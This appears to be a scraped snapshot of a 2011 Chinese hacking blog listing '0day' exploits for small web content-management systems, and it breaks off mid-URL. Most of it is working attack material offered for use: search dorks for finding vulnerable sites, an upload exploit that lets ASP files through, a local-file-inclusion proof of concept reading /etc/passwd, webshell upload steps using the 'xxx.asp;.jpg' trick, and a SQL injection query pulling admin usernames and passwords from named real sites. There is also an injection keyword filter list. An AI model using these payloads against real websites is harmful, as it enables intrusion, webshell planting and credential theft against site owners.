hacker8.info
HTTP/1.1 200 OK 服务器:nginx 访问时间:2016年10月11日 16:40:23 类型:text/html Transfer-Encoding: chunked 连接:关闭 动作:Accept-Encoding 过期时间:2016年10月11日 16:40:22 缓存控制:不缓存 Content-Encoding: gzip
黑猫'blog 最新漏洞 0day漏洞 seo优化 最新漏洞 0day漏洞 seo优化 黑猫 最新漏洞 网络安全 seo wordpress 心情日记 友情连接 2011九月26 asp网上商城cookies注入漏洞 最新漏洞 0 Comments 关键字: inurl:sort.asp?sort_id= 或者 inurl:pinpai.asp?pinpai_id= ‘表单数据初步判断,检验攻击语句 Code: Form_Badword=”%20or%20|’|””|%|update|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe” if request.form<>”” and uBits =”” then Chk_badword=split(Form_Badword,”|”) FOR EACH name IN Request.Form for i=0 to ubound(Chk_badword) If Instr(LCase(request.form(name)),Chk_badword(i))<>0 Then showerr “e” End If NEXT NEXT end if ‘参数初步判断,检验攻击语句 Query_Badword=”%20or%20|’|””|%|update|=|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe” if request.QueryString<>”” then Chk_badword=split(Query_Badword,”|”) … 2011九月26 優吉兒網站管理系统 ODAY 最新漏洞 0 Comments EXP: admin/ugA_UploadImg.asp?hidfrmN=frmUG&hidtxtN=txtImgPath02&hidImgP=ImgSynLife&hidFileName=&hidReName=Y&hidReturn=Y&hidImgSize=400,533,160,120&hidFileSize=&hidImgType=jpg,jpeg,jpe,asp 19.复制代码 20.直接上传ASP,然后查看源文件。。即可。 2011九月26 酷纬企业网站管理系统本地包含漏洞 最新漏洞 0 Comments 漏洞文件:inc/ajax.php 漏洞代码: <?php header(‘Content-Type:text/html; charset=utf-8′); $absolutepath = $_GET['absolutepath']; require_once($absolutepath.’inc/common.inc.php’); $sql = “update {$configTableHead}{$dbtable} set clicknum={$clicknum}+1 where id={$id}”; $result = $dbInstance->query($sql); ?> $absolutepath参数直接获取GET传递的值没有任何过滤加入require_once! 这个包含的而且还是数据库配置文件! POC: ajax.php?absolutepath=../../../../../../../../../../../etc/passwd%00. 2011九月26 自助拿站0day 漏洞 oday 最新漏洞 0 Comments googel搜索关键字:inurl:website/html/?163.html 利用方法: 在首页 “会员登录”处注册一个新用户登录,再回到首页,找到一个可以试用的模板, 点击“试用”后,根据提示填好内容,点“登录”来到后台,(默认后台为:http://www.lvbaowang.com/xxx/adm/index.php 默认账号webmaster 密码是你自己设置的) 在后台点击网站设置—界面风格” 记住你建的“模版目录名”,在后面查找地址时有用。点击后面的“修改”来到一个上传的地方。 这里就是整个的重点了。这里有两个上传的地方一个是“模版文件上传”,它上传成功后会出现在右边,它的上面格式为:xxx.php;.html。另一个是“图片文件上传”,它上传成功后在右边的“images”中,它的上传格式为:xxx.asp;.jpg。随便选一个上传都是可以的。 最后我们来找我们上传后文件的路径,这里我们经过查找已经知道了它的默认上传路径:http://www.lvbaowang.com/xxxx/templates/模版目录名/images/xxx.asp;.jpg(图片文件上传后的路径)。 http://www.lvbaowang.com/xxxx/templates/模版目录名/xxx.php;.html(模版文件上传后的路径)。注:模版目录名我们在前面已经得到。 2011九月26 企成汽车配件网站管理系统存在注入漏洞 最新漏洞 0 Comments by Mr.DzY code download: http://www.mycodes.net/25/4799.htm 证明: http://www.swit.cn/cms/carpj/RequireView.asp?id=6 union select%201,username,password,4,5,6,7,8,9 from nwebadmin 2011九月26 驾校培训网站管理系统 v1.0 漏洞 最新漏洞 0 Comments <% Set rsnews=Server.CreateObject(“ADODB.RecordSet”) sql=”update news set hits=hits+1 where id=”&cstr(request(“id”)) conn.execute sql %> */ 单纯的reuqest(),并没用指定是request.querystring(),还是request.form,或request.cookie (). 利用: http://www.lvbaowang.com/ji
© 2010 - 2020 网站综合信息查询 同IP网站查询 相关类似网站查询 网站备案查询网站地图 最新查询 最近更新 优秀网站 热门网站 全部网站 同IP查询 备案查询
2024-05-12 17:55, Process in 0.0062 second.